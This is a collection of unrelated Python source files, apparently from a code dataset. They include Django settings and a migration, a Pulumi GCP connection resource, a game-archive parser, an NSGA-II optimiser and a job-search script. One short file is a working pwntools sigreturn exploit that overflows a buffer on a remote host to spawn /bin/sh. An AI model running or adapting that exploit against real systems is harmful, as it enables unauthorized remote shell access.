(1, _("A combinar")),
(2, _("CLT")),
(3, _("PJ")),
(4, _("Estágio")),
]
FEEDBACK_TYPE = [(1, _("Sem feedback")), (2, _("Aprovado")), (3, _("Reprovado"))]
SITE_ID = config("SITE_ID", default=1, cast=int)
LINKEDIN_EMAIL = config("LINKEDIN_EMAIL", default=None)
LINKEDIN_PASSWORD = config("LINKEDIN_PASSWORD", default=None)
AUTHENTICATION_BACKENDS = (
"social_core.backends.github.GithubOAuth2",
"social_core.backends.linkedin.LinkedinOAuth2",
"django.contrib.auth.backends.ModelBackend",
)
SOCIAL_AUTH_GITHUB_KEY = config("SOCIAL_AUTH_GITHUB_KEY", default=None)
SOCIAL_AUTH_GITHUB_SECRET = config("SOCIAL_AUTH_GITHUB_SECRET", default=None)
SOCIAL_AUTH_LINKEDIN_OAUTH2_KEY = config(
"SOCIAL_AUTH_LINKEDIN_OAUTH2_KEY", default=None
)
SOCIAL_AUTH_LINKEDIN_OAUTH2_SECRET = config(
"SOCIAL_AUTH_LINKEDIN_OAUTH2_SECRET", default=None
)
SOCIAL_AUTH_LINKEDIN_OAUTH2_SCOPE = ["r_basicprofile", "r_emailaddress"]
SOCIAL_AUTH_LINKEDIN_OAUTH2_FIELD_SELECTORS = [
"email-address",
"formatted-name",
"public-profile-url",
"picture-url",
]
SOCIAL_AUTH_LINKEDIN_OAUTH2_EXTRA_DATA = [
("id", "id"),
("formattedName", "name"),
("emailAddress", "email_address"),
("pictureUrl", "picture_url"),
("publicProfileUrl", "profile_url"),
]
BLOG_API_URL = config("BLOG_API_URL", default=None)
|
py | 1a3f65e584f271f616d964f0b504892d0676f965 | from pwn import *
context.arch = 'amd64'
host = '5.101.72.234'
port = 33074
execve_syscall_num = 59
bin_sh_addr = 0x402000
syscall = 0x40100B
sigret = 0x401004
if __name__ == "__main__":
#p = process( "./main" )
p = remote( host, port )
paylaod = 'a' * 72
paylaod += p64( sigret )
sigFrame = SigreturnFrame( kernel = "amd64" )
sigFrame.rax = execve_syscall_num
sigFrame.rdi = bin_sh_addr
sigFrame.rsi = 0
sigFrame.rdx = 0
sigFrame.rip = syscall
paylaod += str( sigFrame )
p.send( paylaod + "\n" )
p.interactive()
|
py | 1a3f669446e2c7f3b236bae5f4e11623d41df1a9 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ConnectionArgs', 'Connection']
@pulumi.input_type
class ConnectionArgs:
def __init__(__self__, *,
network: pulumi.Input[str],
reserved_peering_ranges: pulumi.Input[Sequence[pulumi.Input[str]]],
service: pulumi.Input[str]):
"""
The set of arguments for constructing a Connection resource.
:param pulumi.Input[str] network: Name of VPC network connected with service producers using VPC peering.
:param pulumi.Input[Sequence[pulumi.Input[str]]] reserved_peering_ranges: Named IP address range(s) of PEERING type reserved for
this service provider. Note that invoking this method with a different range when connection
is already established will not reallocate already provisioned service producer subnetworks.
:param pulumi.Input[str] service: Provider peering service that is managing peering connectivity for a
service provider organization. For Google services that support this functionality it is
'servicenetworking.googleapis.com'.
"""
pulumi.set(__self__, "network", network)
pulumi.set(__self__, "reserved_peering_ranges", reserved_peering_ranges)
pulumi.set(__self__, "service", service)
@property
@pulumi.getter
def network(self) -> pulumi.Input[str]:
"""
Name of VPC network connected with service producers using VPC peering.
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: pulumi.Input[str]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="reservedPeeringRanges")
def reserved_peering_ranges(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
Named IP address range(s) of PEERING type reserved for
this service provider. Note that invoking this method with a different range when connection
is already established will not reallocate already provisioned service producer subnetworks.
"""
return pulumi.get(self, "reserved_peering_ranges")
@reserved_peering_ranges.setter
def reserved_peering_ranges(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "reserved_peering_ranges", value)
@property
@pulumi.getter
def service(self) -> pulumi.Input[str]:
"""
Provider peering service that is managing peering connectivity for a
service provider organization. For Google services that support this functionality it is
'servicenetworking.googleapis.com'.
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: pulumi.Input[str]):
pulumi.set(self, "service", value)
@pulumi.input_type
class _ConnectionState:
def __init__(__self__, *,
network: Optional[pulumi.Input[str]] = None,
peering: Optional[pulumi.Input[str]] = None,
reserved_peering_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Connection resources.
:param pulumi.Input[str] network: Name of VPC network connected with service producers using VPC peering.
:param pulumi.Input[str] peering: (Computed) The name of the VPC Network Peering connection that was created by the service producer.
:param pulumi.Input[Sequence[pulumi.Input[str]]] reserved_peering_ranges: Named IP address range(s) of PEERING type reserved for
this service provider. Note that invoking this method with a different range when connection
is already established will not reallocate already provisioned service producer subnetworks.
:param pulumi.Input[str] service: Provider peering service that is managing peering connectivity for a
service provider organization. For Google services that support this functionality it is
'servicenetworking.googleapis.com'.
"""
if network is not None:
pulumi.set(__self__, "network", network)
if peering is not None:
pulumi.set(__self__, "peering", peering)
if reserved_peering_ranges is not None:
pulumi.set(__self__, "reserved_peering_ranges", reserved_peering_ranges)
if service is not None:
pulumi.set(__self__, "service", service)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
"""
Name of VPC network connected with service producers using VPC peering.
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network", value)
@property
@pulumi.getter
def peering(self) -> Optional[pulumi.Input[str]]:
"""
(Computed) The name of the VPC Network Peering connection that was created by the service producer.
"""
return pulumi.get(self, "peering")
@peering.setter
def peering(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "peering", value)
@property
@pulumi.getter(name="reservedPeeringRanges")
def reserved_peering_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Named IP address range(s) of PEERING type reserved for
this service provider. Note that invoking this method with a different range when connection
is already established will not reallocate already provisioned service producer subnetworks.
"""
return pulumi.get(self, "reserved_peering_ranges")
@reserved_peering_ranges.setter
def reserved_peering_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "reserved_peering_ranges", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input[str]]:
"""
Provider peering service that is managing peering connectivity for a
service provider organization. For Google services that support this functionality it is
'servicenetworking.googleapis.com'.
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service", value)
class Connection(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
network: Optional[pulumi.Input[str]] = None,
reserved_peering_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a private VPC connection with a GCP service provider. For more information see
[the official documentation](https://cloud.google.com/vpc/docs/configure-private-services-access#creating-connection)
and
[API](https://cloud.google.com/service-infrastructure/docs/service-networking/reference/rest/v1/services.connections).
## Example Usage
```python
import pulumi
import pulumi_gcp as gcp
peering_network = gcp.compute.Network("peeringNetwork")
private_ip_alloc = gcp.compute.GlobalAddress("privateIpAlloc",
purpose="VPC_PEERING",
address_type="INTERNAL",
prefix_length=16,
network=peering_network.id)
foobar = gcp.servicenetworking.Connection("foobar",
network=peering_network.id,
service="servicenetworking.googleapis.com",
reserved_peering_ranges=[private_ip_alloc.name])
```
## Import
ServiceNetworkingConnection can be imported using any of these accepted formats
```sh
$ pulumi import gcp:servicenetworking/connection:Connection peering_connection {{peering-network}}:{{service}}
```
```sh
$ pulumi import gcp:servicenetworking/connection:Connection peering_connection /projects/{{project}}/global/networks/{{peering-network}}:{{service}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] network: Name of VPC network connected with service producers using VPC peering.
:param pulumi.Input[Sequence[pulumi.Input[str]]] reserved_peering_ranges: Named IP address range(s) of PEERING type reserved for
this service provider. Note that invoking this method with a different range when connection
is already established will not reallocate already provisioned service producer subnetworks.
:param pulumi.Input[str] service: Provider peering service that is managing peering connectivity for a
service provider organization. For Google services that support this functionality it is
'servicenetworking.googleapis.com'.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ConnectionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a private VPC connection with a GCP service provider. For more information see
[the official documentation](https://cloud.google.com/vpc/docs/configure-private-services-access#creating-connection)
and
[API](https://cloud.google.com/service-infrastructure/docs/service-networking/reference/rest/v1/services.connections).
## Example Usage
```python
import pulumi
import pulumi_gcp as gcp
peering_network = gcp.compute.Network("peeringNetwork")
private_ip_alloc = gcp.compute.GlobalAddress("privateIpAlloc",
purpose="VPC_PEERING",
address_type="INTERNAL",
prefix_length=16,
network=peering_network.id)
foobar = gcp.servicenetworking.Connection("foobar",
network=peering_network.id,
service="servicenetworking.googleapis.com",
reserved_peering_ranges=[private_ip_alloc.name])
```
## Import
ServiceNetworkingConnection can be imported using any of these accepted formats
```sh
$ pulumi import gcp:servicenetworking/connection:Connection peering_connection {{peering-network}}:{{service}}
```
```sh
$ pulumi import gcp:servicenetworking/connection:Connection peering_connection /projects/{{project}}/global/networks/{{peering-network}}:{{service}}
```
:param str resource_name: The name of the resource.
:param ConnectionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ConnectionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
network: Optional[pulumi.Input[str]] = None,
reserved_peering_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ConnectionArgs.__new__(ConnectionArgs)
if network is None and not opts.urn:
raise TypeError("Missing required property 'network'")
__props__.__dict__["network"] = network
if reserved_peering_ranges is None and not opts.urn:
raise TypeError("Missing required property 'reserved_peering_ranges'")
__props__.__dict__["reserved_peering_ranges"] = reserved_peering_ranges
if service is None and not opts.urn:
raise TypeError("Missing required property 'service'")
__props__.__dict__["service"] = service
__props__.__dict__["peering"] = None
super(Connection, __self__).__init__(
'gcp:servicenetworking/connection:Connection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
network: Optional[pulumi.Input[str]] = None,
peering: Optional[pulumi.Input[str]] = None,
reserved_peering_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service: Optional[pulumi.Input[str]] = None) -> 'Connection':
"""
Get an existing Connection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] network: Name of VPC network connected with service producers using VPC peering.
:param pulumi.Input[str] peering: (Computed) The name of the VPC Network Peering connection that was created by the service producer.
:param pulumi.Input[Sequence[pulumi.Input[str]]] reserved_peering_ranges: Named IP address range(s) of PEERING type reserved for
this service provider. Note that invoking this method with a different range when connection
is already established will not reallocate already provisioned service producer subnetworks.
:param pulumi.Input[str] service: Provider peering service that is managing peering connectivity for a
service provider organization. For Google services that support this functionality it is
'servicenetworking.googleapis.com'.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ConnectionState.__new__(_ConnectionState)
__props__.__dict__["network"] = network
__props__.__dict__["peering"] = peering
__props__.__dict__["reserved_peering_ranges"] = reserved_peering_ranges
__props__.__dict__["service"] = service
return Connection(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def network(self) -> pulumi.Output[str]:
"""
Name of VPC network connected with service producers using VPC peering.
"""
return pulumi.get(self, "network")
@property
@pulumi.getter
def peering(self) -> pulumi.Output[str]:
"""
(Computed) The name of the VPC Network Peering connection that was created by the service producer.
"""
return pulumi.get(self, "peering")
@property
@pulumi.getter(name="reservedPeeringRanges")
def reserved_peering_ranges(self) -> pulumi.Output[Sequence[str]]:
"""
Named IP address range(s) of PEERING type reserved for
this service provider. Note that invoking this method with a different range when connection
is already established will not reallocate already provisioned service producer subnetworks.
"""
return pulumi.get(self, "reserved_peering_ranges")
@property
@pulumi.getter
def service(self) -> pulumi.Output[str]:
"""
Provider peering service that is managing peering connectivity for a
service provider organization. For Google services that support this functionality it is
'servicenetworking.googleapis.com'.
"""
return pulumi.get(self, "service")
|
py | 1a3f698745f7e19d4ec5a5790be012d33d025f51 | import dataclasses
import typing
from typing import Optional
import construct
from construct import (
Struct, PrefixedArray, Int64ul, Int32ul, Hex, Construct, Computed, Array, Tell,
Aligned, FocusedSeq, Rebuild, Seek, Pointer, Prefixed, GreedyBytes,
)
from mercury_engine_data_structures import dread_data
from mercury_engine_data_structures.construct_extensions.alignment import AlignTo
from mercury_engine_data_structures.construct_extensions.misc import Skip
from mercury_engine_data_structures.formats.base_resource import BaseResource, NameOrAssetId, resolve_asset_id, AssetId
from mercury_engine_data_structures.game_check import Game
Construct_AssetId = Hex(Int64ul)
def offset_for(con: Struct, name: str):
result = 0
for sc in con.subcons:
sc = typing.cast(Construct, sc)
if sc.name == name:
return result
result += sc.sizeof()
raise construct.ConstructError(f"Unknown field: {name}")
def header_field(field_name: str):
offset = offset_for(FileEntry, field_name)
def result(ctx):
parents = [ctx]
while "_" in parents[-1]:
parents.append(parents[-1]["_"])
start_headers = None
index = None
for c in reversed(parents):
if "_start_headers" in c:
start_headers = c["_start_headers"]
break
for c in parents:
if "_resource_index" in c:
index = c["_resource_index"]
break
if index is None or start_headers is None:
raise ValueError("Missing required context key")
return start_headers + (index * FileEntry.sizeof()) + offset
return result
FileEntry = Struct(
asset_id=Construct_AssetId,
start_offset=Int32ul,
end_offset=Int32ul,
)
PKGHeader = Struct(
header_size=Int32ul,
data_section_size=Int32ul,
file_entries=PrefixedArray(Int32ul, FileEntry),
)
PKG = Struct(
_header_size=Skip(1, Int32ul),
_data_section_size_address=Tell,
_data_section_size=Skip(1, Int32ul),
_num_files=Rebuild(Int32ul, construct.len_(construct.this.files)),
_start_headers=Tell,
_skip_headers=Seek(lambda ctx: ctx._num_files * FileEntry.sizeof(), 1),
_align=AlignTo(128),
_files_start=Tell,
_update_header_size=Pointer(
0x0,
Rebuild(Int32ul, lambda ctx: ctx._files_start - Int32ul.sizeof()),
),
files=Array(
construct.this._num_files,
Aligned(8, FocusedSeq(
"item",
_resource_index=Computed(lambda ctx: ctx["_index"]),
actual_start_offset=Tell,
start_offset=Pointer(header_field("start_offset"),
Rebuild(Int32ul, lambda ctx: ctx.actual_start_offset)),
end_offset=Pointer(header_field("end_offset"),
Rebuild(Int32ul, lambda ctx: ctx.start_offset + len(ctx.item.data))),
item_size=Computed(lambda ctx: ctx.end_offset - ctx.start_offset),
item=Struct(
asset_id=Pointer(header_field("asset_id"), Construct_AssetId),
asset_name=Computed(lambda ctx: dread_data.name_for_asset_id(ctx.asset_id)),
data=Prefixed(
Rebuild(
Computed(lambda ctx: ctx._.item_size),
construct.len_(construct.this.data),
),
GreedyBytes,
),
),
)),
),
_files_end=Tell,
_update_data_section_size=Pointer(
lambda ctx: ctx._data_section_size_address,
Rebuild(Int32ul, lambda ctx: ctx._files_end - ctx._files_start),
),
)
@dataclasses.dataclass(frozen=True)
class PkgFile:
asset_id: AssetId
data: bytes
@property
def asset_name(self) -> Optional[str]:
return dread_data.name_for_asset_id(self.asset_id)
class Pkg(BaseResource):
@classmethod
def construct_class(cls, target_game: Game) -> Construct:
return PKG
@classmethod
def parse_stream(cls, stream: typing.BinaryIO, target_game: Game) -> "Pkg":
return cls(cls.construct_class(target_game).parse_stream(stream, target_game=target_game),
target_game)
def build_stream(self, stream: typing.BinaryIO) -> bytes:
return self.construct_class(self.target_game).build_stream(self._raw, stream, target_game=self.target_game)
@property
def all_assets(self) -> typing.Iterator[PkgFile]:
for file in self.raw.files:
yield PkgFile(file.asset_id, file.data)
def get_asset(self, asset_id: NameOrAssetId) -> Optional[bytes]:
asset_id = resolve_asset_id(asset_id)
for file in self.raw.files:
if file.asset_id == asset_id:
return file.data
return None
def replace_asset(self, asset_id: NameOrAssetId, new_file: bytes):
asset_id = resolve_asset_id(asset_id)
for file in self.raw.files:
if file.asset_id == asset_id:
file.data = new_file
return
raise ValueError(f"Unknown asset id: {asset_id}")
def add_asset(self, asset_id: NameOrAssetId, new_file: bytes):
asset_id = resolve_asset_id(asset_id)
if self.get_asset(asset_id) is not None:
raise ValueError(f"Asset id already exists: {asset_id}")
self.raw.files.append(construct.Container(
asset_id=asset_id,
data=new_file,
))
def remove_asset(self, asset_id: NameOrAssetId):
asset_id = resolve_asset_id(asset_id)
for file in self.raw.files:
if file.asset_id == asset_id:
self.raw.files.remove(file)
return
raise ValueError(f"Unknown asset id: {asset_id}")
|
py | 1a3f6a7451c5a2a1637eab0a25d43c7915483ef5 | # -*- coding: utf-8 -*-
"""
30-07-2019
Dennis van Gils
"""
from timeit import timeit
setup = """
import numpy as np
from numpy_ringbuffer import RingBuffer
from collections import deque
import os,sys,inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0,parentdir)
from dvg_ringbuffer import RingBuffer as DvG_RingBuffer
np.random.seed(0)
N_buffers_passed = 100
buffer_size = 500
deque_size = 20500
rb1 = RingBuffer(capacity=deque_size)
rb2 = DvG_RingBuffer(capacity=deque_size)
dq1 = deque(maxlen=deque_size)
def try1():
for i in range(N_buffers_passed):
rb1.extend(np.random.randn(buffer_size))
if rb1.is_full:
c = rb1[0:100]
#d = np.asarray(rb2)
#print(c.__array_interface__['data'][0])
def try2():
for i in range(N_buffers_passed):
rb2.extend(np.random.randn(buffer_size))
if rb2.is_full:
c = rb2[0:100]
#d = np.asarray(rb2)
#print(c.__array_interface__['data'][0])
def try3():
for i in range(N_buffers_passed):
dq1.extend(np.random.randn(buffer_size))
if len(dq1) == dq1.maxlen:
c = (np.array(dq1))[0:100]
#print(c.__array_interface__['data'][0])
"""
N = 100
print("Numpy RingBuffer strategies")
print(
"unwrap default : %.3f ms"
% (timeit("try1()", setup=setup, number=N) / N * 1000)
)
print(
"unwrap into buffer: %.3f ms"
% (timeit("try2()", setup=setup, number=N) / N * 1000)
)
print("Slow deque")
print(
"deque : %.3f ms"
% (timeit("try3()", setup=setup, number=N) / N * 1000)
)
|
py | 1a3f6b3274b10d85f89029b073b7bc2b80c64b8f | import numpy as np
from pymoo.algorithms.genetic_algorithm import GeneticAlgorithm
from pymoo.model.individual import Individual
from pymoo.model.survival import Survival
from pymoo.operators.crossover.simulated_binary_crossover import SimulatedBinaryCrossover
from pymoo.operators.default_operators import set_if_none
from pymoo.operators.mutation.polynomial_mutation import PolynomialMutation
from pymoo.operators.sampling.random_sampling import RandomSampling
from pymoo.operators.selection.tournament_selection import TournamentSelection, compare
from pymoo.util.display import disp_multi_objective
from pymoo.util.dominator import Dominator
from pymoo.util.non_dominated_sorting import NonDominatedSorting
from pymoo.util.randomized_argsort import randomized_argsort
class NSGA2(GeneticAlgorithm):
def __init__(self, pop_size=100, **kwargs):
# always store the individual to store rank and crowding
kwargs['individual'] = Individual(rank=np.inf, crowding=-1)
# default settings for nsga2 - not overwritten if provided as kwargs
set_if_none(kwargs, 'pop_size', pop_size)
set_if_none(kwargs, 'sampling', RandomSampling())
set_if_none(kwargs, 'selection', TournamentSelection(func_comp=binary_tournament))
set_if_none(kwargs, 'crossover', SimulatedBinaryCrossover(prob_cross=0.9, eta_cross=15))
set_if_none(kwargs, 'mutation', PolynomialMutation(prob_mut=None, eta_mut=20))
set_if_none(kwargs, 'survival', RankAndCrowdingSurvival())
set_if_none(kwargs, 'eliminate_duplicates', True)
super().__init__(**kwargs)
self.tournament_type = 'comp_by_dom_and_crowding'
self.func_display_attrs = disp_multi_objective
def binary_tournament(pop, P, algorithm, **kwargs):
if P.shape[1] != 2:
raise ValueError("Only implemented for binary tournament!")
tournament_type = algorithm.tournament_type
S = np.full(P.shape[0], np.nan)
for i in range(P.shape[0]):
a, b = P[i, 0], P[i, 1]
# if at least one solution is infeasible
if pop[a].CV > 0.0 or pop[b].CV > 0.0:
S[i] = compare(a, pop[a].CV, b, pop[b].CV, method='smaller_is_better', return_random_if_equal=True)
# both solutions are feasible
else:
if tournament_type == 'comp_by_dom_and_crowding':
rel = Dominator.get_relation(pop[a].F, pop[b].F)
if rel == 1:
S[i] = a
elif rel == -1:
S[i] = b
elif tournament_type == 'comp_by_rank_and_crowding':
S[i] = compare(a, pop[a].rank, b, pop[b].rank,
method='smaller_is_better')
else:
raise Exception("Unknown tournament type.")
# if rank or domination relation didn't make a decision compare by crowding
if np.isnan(S[i]):
S[i] = compare(a, pop[a].get("crowding"), b, pop[b].get("crowding"),
method='larger_is_better', return_random_if_equal=True)
return S[:, None].astype(np.int)
class RankAndCrowdingSurvival(Survival):
def __init__(self) -> None:
super().__init__(True)
def _do(self, pop, n_survive, D=None, **kwargs):
# get the objective space values and objects
F = pop.get("F")
# the final indices of surviving individuals
survivors = []
# do the non-dominated sorting until splitting front
fronts = NonDominatedSorting().do(F, n_stop_if_ranked=n_survive)
for k, front in enumerate(fronts):
# calculate the crowding distance of the front
crowding_of_front = calc_crowding_distance(F[front, :])
# save rank and crowding in the individual class
for j, i in enumerate(front):
pop[i].set("rank", k)
pop[i].set("crowding", crowding_of_front[j])
# current front sorted by crowding distance if splitting
if len(survivors) + len(front) > n_survive:
I = randomized_argsort(crowding_of_front, order='descending', method='numpy')
I = I[:(n_survive - len(survivors))]
# otherwise take the whole front unsorted
else:
I = np.arange(len(front))
# extend the survivors by all or selected individuals
survivors.extend(front[I])
return pop[survivors]
def calc_crowding_distance(F):
infinity = 1e+14
n_points = F.shape[0]
n_obj = F.shape[1]
if n_points <= 2:
return np.full(n_points, infinity)
else:
# sort each column and get index
I = np.argsort(F, axis=0, kind='mergesort')
# now really sort the whole array
F = F[I, np.arange(n_obj)]
# get the distance to the last element in sorted list and replace zeros with actual values
dist = np.concatenate([F, np.full((1, n_obj), np.inf)]) \
- np.concatenate([np.full((1, n_obj), -np.inf), F])
index_dist_is_zero = np.where(dist == 0)
dist_to_last = np.copy(dist)
for i, j in zip(*index_dist_is_zero):
dist_to_last[i, j] = dist_to_last[i - 1, j]
dist_to_next = np.copy(dist)
for i, j in reversed(list(zip(*index_dist_is_zero))):
dist_to_next[i, j] = dist_to_next[i + 1, j]
# normalize all the distances
norm = np.max(F, axis=0) - np.min(F, axis=0)
norm[norm == 0] = np.nan
dist_to_last, dist_to_next = dist_to_last[:-1] / norm, dist_to_next[1:] / norm
# if we divided by zero because all values in one columns are equal replace by none
dist_to_last[np.isnan(dist_to_last)] = 0.0
dist_to_next[np.isnan(dist_to_next)] = 0.0
# sum up the distance to next and last and norm by objectives - also reorder from sorted list
J = np.argsort(I, axis=0)
crowding = np.sum(dist_to_last[J, np.arange(n_obj)] + dist_to_next[J, np.arange(n_obj)], axis=1) / n_obj
# replace infinity with a large number
crowding[np.isinf(crowding)] = infinity
return crowding
|
py | 1a3f6df061d10fe8ce93e74eb544e09463845970 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Discovery models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from ralph.discovery.models_device import (
Connection,
ConnectionType,
Database,
DatabaseType,
DeprecationKind,
Device,
DeviceEnvironment,
DeviceModel,
DeviceType,
DISK_PRODUCT_BLACKLIST,
DISK_VENDOR_BLACKLIST,
LoadBalancerMember,
LoadBalancerPool,
LoadBalancerType,
LoadBalancerVirtualServer,
MarginKind,
NetworkConnection,
ReadOnlyDevice,
SERIAL_BLACKLIST,
ServiceCatalog,
UptimeSupport,
)
from ralph.discovery.models_network import (
DataCenter,
DiscoveryQueue,
Environment,
IPAddress,
IPAlias,
Network,
NetworkKind,
NetworkTerminator,
)
from ralph.discovery.models_component import (
ComponentModel,
ComponentType,
DiskShare,
DiskShareMount,
Ethernet,
EthernetSpeed,
FibreChannel,
GenericComponent,
MAC_PREFIX_BLACKLIST,
Memory,
OperatingSystem,
Processor,
Software,
SplunkUsage,
Storage,
)
from ralph.discovery.models_history import (
DiscoveryValue,
HistoryChange,
)
ASSET_NOT_REQUIRED = (
DeviceType.rack,
DeviceType.blade_system,
DeviceType.management,
DeviceType.power_distribution_unit,
DeviceType.data_center,
DeviceType.switch_stack,
DeviceType.virtual_server,
DeviceType.cloud_server,
DeviceType.unknown
)
__all__ = [
'DataCenter',
'DiscoveryQueue',
'Environment',
'IPAddress',
'IPAlias',
'MAC_PREFIX_BLACKLIST',
'Network',
'NetworkKind',
'NetworkTerminator',
'ComponentModel',
'ComponentType',
'DiskShare',
'DiskShareMount',
'Ethernet',
'EthernetSpeed',
'FibreChannel',
'GenericComponent',
'Memory',
'OperatingSystem',
'Processor',
'Software',
'SplunkUsage',
'Storage',
'DISK_PRODUCT_BLACKLIST',
'DISK_VENDOR_BLACKLIST',
'Database',
'DatabaseType',
'DeprecationKind',
'Device',
'DeviceEnvironment',
'DeviceModel',
'DeviceType',
'Connection',
'ConnectionType',
'LoadBalancerMember',
'LoadBalancerPool',
'LoadBalancerType',
'LoadBalancerVirtualServer',
'MarginKind',
'NetworkConnection',
'ReadOnlyDevice',
'SERIAL_BLACKLIST',
'ServiceCatalog',
'UptimeSupport',
'HistoryChange',
'DiscoveryValue',
'ASSET_NOT_REQUIRED',
]
# Load the plugins code
import ralph.discovery.plugins # noqa
|
py | 1a3f6e83d9d2e7433396e8ee411613f34bd6ef1d | import os
from dotenv import find_dotenv, load_dotenv
import socket
from indeed import IndeedClient
import re
project_dir = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)
def get_ip():
return socket.gethostbyname(socket.gethostname())
# Set static user parameters
load_dotenv(find_dotenv())
indeed_pub_id = os.environ.get("INDEED_PUB_ID")
user_agent = os.environ.get("DEF_USER_AGENT")
static_params = {
'userip' : get_ip(),
'useragent' : user_agent
}
client = IndeedClient(indeed_pub_id)
# Script that pulls job search data using Indeed's api
def job_search(params):
# query and location parameters are required
if "q" not in params:
print("Please include query parameter")
return None
if "l" not in params:
print("Please include location parameter")
return None
params.update(static_params)
search_response = client.search(**params)
return search_response
def job_details(keys):
details_response = client.jobs(jobkeys = (keys))
return details_response
|
py | 1a3f7016224c5885b9f23ef6f0a6ccb405d5c14f | # Generated by Django 3.0.7 on 2020-07-02 01:17
from django.conf import settings
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
]
operations = [
migrations.CreateModel(
name='CustomUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('uid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True)),
('channels', models.TextField(blank=True)),
('privs', models.TextField(blank=True)),
('subs', models.TextField(blank=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='Channel',
fields=[
('cid', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False, unique=True)),
('title', models.CharField(max_length=255)),
('slug', models.SlugField(max_length=255, unique=True)),
('vods', models.TextField(blank=True)),
('streamkey', models.UUIDField(default=uuid.uuid4, unique=True)),
